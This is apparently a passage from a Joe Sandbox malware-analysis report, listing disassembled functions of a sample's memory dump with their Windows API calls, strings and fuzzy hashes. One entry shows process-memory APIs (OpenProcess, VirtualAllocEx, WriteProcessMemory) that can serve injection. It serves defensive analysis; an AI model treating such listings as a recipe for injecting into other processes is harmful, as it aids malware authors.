Opcode Fuzzy Hash: 4f568c7a74875eb5507e12f13575f03759bd064bf45d3712e01a1a7c6be9c7b5
Instruction Fuzzy Hash: 5F018670601218BFDB104FE5EC48D6B7FADEF863A5B200529F859C2220DF729C11EA60

Uniqueness

Uniqueness Score: -1.00%

Function 00F357FF Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F3581B
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00F35829
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F35831
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00F3583B
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F35877

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 4ebf69f02108ff4786e5d4bcdd11b89571ef53a607117ce71f1ebd296ede7b83
Instruction ID: cf1541c86b1b727ab49d298c49be1c5734d278b91596251dc1df5484500eda2b
Opcode Fuzzy Hash: 4ebf69f02108ff4786e5d4bcdd11b89571ef53a607117ce71f1ebd296ede7b83
Instruction Fuzzy Hash: FD016931C01A1DDBCF009FE8DD48AEEBBB8FB49B21F114556E411B2140CF709550EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F27D28 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F27C62,80070057,?,?,?,00F28073), ref: 00F27D45
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F27C62,80070057,?,?), ref: 00F27D60
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F27C62,80070057,?,?), ref: 00F27D6E
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F27C62,80070057,?), ref: 00F27D7E
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F27C62,80070057,?,?), ref: 00F27D8A

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: beb3513c4553070e3b052f84f1e6ef42c60803d68a32d9b9b63984a768d19cf8
Instruction ID: bd6431c2f14902d463a429ba7b4ce5d7e5efeb75ce0fcf6ee5694fee168ae41f
Opcode Fuzzy Hash: beb3513c4553070e3b052f84f1e6ef42c60803d68a32d9b9b63984a768d19cf8
Instruction Fuzzy Hash: A2017176A05328ABDB119F64EC44BAA7BADEF44762F644014F908D7210DBB1DD00EBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00F28CC7 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F28CDE
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F28CE8
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F28CF7
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F28CFE
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F28D14

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: f03f1d4ba1b0dd0f0d8f43301b444d0aaec58393b5667581cf558d4c3455f948
Instruction ID: 423ce5833d864c29dff4cee8c1e624df6c18d30295b1ee4b89a8405fd2d1b82d
Opcode Fuzzy Hash: f03f1d4ba1b0dd0f0d8f43301b444d0aaec58393b5667581cf558d4c3455f948
Instruction Fuzzy Hash: A7F0AF30201218BFEB100FA4AC89EA73BACEF4A7A4B604425F904C2190CEA19C05FB60

Uniqueness

Uniqueness Score: -1.00%

Function 00F28D28 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F28D3F
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F28D49
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F28D58
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00F28D5F
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F28D75

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 4e51bc2cb15a229ad42d4e54a3c655945a6a45778d65332af56ba8798fbb6386
Instruction ID: 6f0a21f7125c71a04db896f38fd618da273fc4602118f974af8301faf5bd0f22
Opcode Fuzzy Hash: 4e51bc2cb15a229ad42d4e54a3c655945a6a45778d65332af56ba8798fbb6386
Instruction Fuzzy Hash: 9FF0AF30211218BFEB110FA4EC88F673BACEF4A7A4F640115F954C2290CFA19D06FB60

Uniqueness

Uniqueness Score: -1.00%

Function 00F2CD7C Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 00F2CD90
GetWindowTextW.USER32 ref: 00F2CDA7
MessageBeep.USER32(00000000), ref: 00F2CDBF
KillTimer.USER32(?,0000040A), ref: 00F2CDDB
EndDialog.USER32(?,00000001), ref: 00F2CDF5

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 176edc0deccc96836d451339de4cc61c2241750c99c90871405c25eb4f84ce0f
Instruction ID: c5761b4613d3149afb35b2fb94fc1c7d3f133637291959aec070d6ccc6a551a6
Opcode Fuzzy Hash: 176edc0deccc96836d451339de4cc61c2241750c99c90871405c25eb4f84ce0f
Instruction Fuzzy Hash: EC01DB31500718ABEB205B14ED4EB977B78FB00711F400669F5A3A10E1DFF1A954ABD0

Uniqueness

Uniqueness Score: -1.00%

Function 00ED178C Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00ED179B
StrokeAndFillPath.GDI32(?,?,00F0BBC9,00000000,?), ref: 00ED17B7
SelectObject.GDI32(?,00000000), ref: 00ED17CA
DeleteObject.GDI32 ref: 00ED17DD
StrokePath.GDI32(?), ref: 00ED17F8

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 1652b9fec5e693b84b39d0a1e5bf89767e379816679fba7277e47c8449f4b472
Instruction ID: 0f1411b44ad70d8730e5bc7acab61aacd1bb96567623604fdc2d8239a12ceb4e
Opcode Fuzzy Hash: 1652b9fec5e693b84b39d0a1e5bf89767e379816679fba7277e47c8449f4b472
Instruction Fuzzy Hash: E3F0C93041834CBBDB116F25ED4C75A3FA4EB0132AF249256F429552F0CB714996EF10

Uniqueness

Uniqueness Score: -1.00%

Function 00F3C9DA Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00F3CA75
CoCreateInstance.OLE32(00F63D3C,00000000,00000001,00F63BAC,?), ref: 00F3CA8D

Part of subcall function 00EE1A36: _memmove.LIBCMT ref: 00EE1A77

CoUninitialize.OLE32 ref: 00F3CCFA

Strings

.lnk, xrefs: 00F3CA09, 00F3CA31, 00F3CA3B

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 5f7ca730784fd4e670f52a566c1951b00c07c397aabcf20d37a2924b5ed48da3
Instruction ID: 34a80f7a0cc8008d9fa75c5573243d76e15d0cc3b35e27eb0379d04f3125d759
Opcode Fuzzy Hash: 5f7ca730784fd4e670f52a566c1951b00c07c397aabcf20d37a2924b5ed48da3
Instruction Fuzzy Hash: 1FA14CB1504205AFD300EF64CC81EAFB7E8EF94714F10595DF155A72A2EB70EA4ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 00EDE3C6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00EF0FE6: std::exception::exception.LIBCMT ref: 00EF101C
Part of subcall function 00EF0FE6: __CxxThrowException@8.LIBCMT ref: 00EF1031

Part of subcall function 00EE1A36: _memmove.LIBCMT ref: 00EE1A77

Part of subcall function 00EE1680: _memmove.LIBCMT ref: 00EE16DB

__swprintf.LIBCMT ref: 00EDE598

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00EDE431

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: adf11077b262f5a5006f0886cd3363483c31d2c29bd5d04d6819a51433967ad9
Instruction ID: 8a39b5b0927fb4e76d35e6efe77eb371ce4fdeeb8da44145cc1ae751f8cb8d75
Opcode Fuzzy Hash: adf11077b262f5a5006f0886cd3363483c31d2c29bd5d04d6819a51433967ad9
Instruction Fuzzy Hash: 0E91BA725082459FC714EF24C895C6EB7E8EF95700F00195EF496AB3A1EA30EE85CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00EF523D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00EF52CD

Part of subcall function 00F00320: __87except.LIBCMT ref: 00F0035B

Strings

pow, xrefs: 00EF52A5, 00EF52C2

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 13ab969f8a5e980d0dbbc6c0abcb1630470d0c4e575c113407a425ec4ae1e53b
Instruction ID: d25e3745735acf27ac906e00c3fdab55179d1d881c9d253e4a1ccb1e5151c291
Opcode Fuzzy Hash: 13ab969f8a5e980d0dbbc6c0abcb1630470d0c4e575c113407a425ec4ae1e53b
Instruction Fuzzy Hash: 5E519E27E09A0D97DB11AB18CD0137A3BA49B50750F305E68E7D1561F9EE788CC4BB46

Uniqueness

Uniqueness Score: -1.00%

Function 00EF0654 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

#, xrefs: 00EF0699
+, xrefs: 00EF0690

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: 566a80f5a78010a98a5851a6c430a8a9574aa9ae15d4fe3f83b7091203c445d5
Instruction ID: 37525ca3d8cc925a407894b53d9054ac1417ca17b26767f2ec3c12254a297964
Opcode Fuzzy Hash: 566a80f5a78010a98a5851a6c430a8a9574aa9ae15d4fe3f83b7091203c445d5
Instruction Fuzzy Hash: D85125759002A9CFDF15EF28D440AFA7BA0EF55324F244095ED91EB2D1D734AC82DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00EDE7F7 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00EDE937
_memmove.LIBCMT ref: 00EDE9D0
_free.LIBCMT ref: 00EDE9F6
_memmove.LIBCMT ref: 00EDEAA9

Strings

#V, xrefs: 00EDE9E2

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: _memmove$_free
String ID: #V
API String ID: 2620147621-3658881132
Opcode ID: c913e16924aa6f9d81a03d2b42b88848438a01ff112331f50c605408ca086921
Instruction ID: 8ae79a2f04ee5b48fbd03863ddcaf19345a2ad0cdb1a3b39d16618e9ba986699
Opcode Fuzzy Hash: c913e16924aa6f9d81a03d2b42b88848438a01ff112331f50c605408ca086921
Instruction Fuzzy Hash: 3C516A716087418FDB24DF28C485B6EB7E1FF85714F44592EE5899B351E731E842CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00EECF0C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EECFC2
_memmove.LIBCMT ref: 00EED060
_memset.LIBCMT ref: 00EED084

Strings

ERCP, xrefs: 00EECF2D

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: 303903c2d8faa24828812779dd36e4f4ed33b4c5a75aad71a456d85c42cdab18
Instruction ID: 46caa90e0b23d3f134e4d946901d570b8baef631f8f8c69b71bdc3111bc30cbb
Opcode Fuzzy Hash: 303903c2d8faa24828812779dd36e4f4ed33b4c5a75aad71a456d85c42cdab18
Instruction Fuzzy Hash: CC51D2B1A0434D9BCB24DF65C8907EABBF5FF04314F24956EE54AEB241E7309682CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00F2A3AD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F31CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F29E4E,?,?,00000034,00000800,?,00000034), ref: 00F31CE5

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00F2A3F7

Part of subcall function 00F31C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F29E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00F31CB0

Part of subcall function 00F31BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00F31C08
Part of subcall function 00F31BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00F29E12,00000034,?,?,00001004,00000000,00000000), ref: 00F31C18
Part of subcall function 00F31BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00F29E12,00000034,?,?,00001004,00000000,00000000), ref: 00F31C2E

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F2A464
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F2A4B1

Strings

@, xrefs: 00F2A4C9

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 58947fef9aaeb5936fcec846c656d83c1b27231821953d76006f7e6a557ec598
Instruction ID: fee82926e963878ad135390f1a84ac47b38e31cc0d9f1931a75215b26289292f
Opcode Fuzzy Hash: 58947fef9aaeb5936fcec846c656d83c1b27231821953d76006f7e6a557ec598
Instruction Fuzzy Hash: 11415C7290022CBFCB10DFA4CD85ADEBBB8EF45350F104095FA55B7190DA71AE85DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F579FE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00F57A86
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00F57A9A
SendMessageW.USER32(?,00001002,00000000,?), ref: 00F57ABE

Strings

SysMonthCal32, xrefs: 00F57A51

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 281ee5c916cf8258b4e7989de87fe84a2e0f5f6e37c9699e8632f78d6f6f582f
Instruction ID: d89497313cbab39e1582a8631f7c6c61d7804bcb92ba499bc4d010c46c99298e
Opcode Fuzzy Hash: 281ee5c916cf8258b4e7989de87fe84a2e0f5f6e37c9699e8632f78d6f6f582f
Instruction Fuzzy Hash: 8F21D332604218BFDF119F54DC42FEE3B69EF48724F110214FF156B1D0DAB5A855ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F581B8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00F5826F
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00F5827D
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F58284

Strings

msctls_updown32, xrefs: 00F581E9

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 23817664d2b235edc5322a387f399ce4192e26d8573cc57e464673d994d9c0d6
Instruction ID: 5f87305d923fd9de35d25a349150f2fe4f7359eedf28d08925dcfaa93d07ff29
Opcode Fuzzy Hash: 23817664d2b235edc5322a387f399ce4192e26d8573cc57e464673d994d9c0d6
Instruction Fuzzy Hash: 3F2181B1A04208AFDB10DF54CC85DA737EDEB593A4F150059FA01A7291CB71EC16EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F572D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00F57360
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00F57370
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00F57395

Strings

Listbox, xrefs: 00F5732D

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 500f406e960b4501f9422b256b7e7531248c0228669b2b5bd5ceab93254635f2
Instruction ID: 2da5b8a43a69c60d8516cb29d1e19217d69eef8295fc7037b248eaa978032c94
Opcode Fuzzy Hash: 500f406e960b4501f9422b256b7e7531248c0228669b2b5bd5ceab93254635f2
Instruction Fuzzy Hash: 0C21C532614218BFDF129F54DC45EBF3BAAEB89771F118124FE1097190C671AC55ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F57D33 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

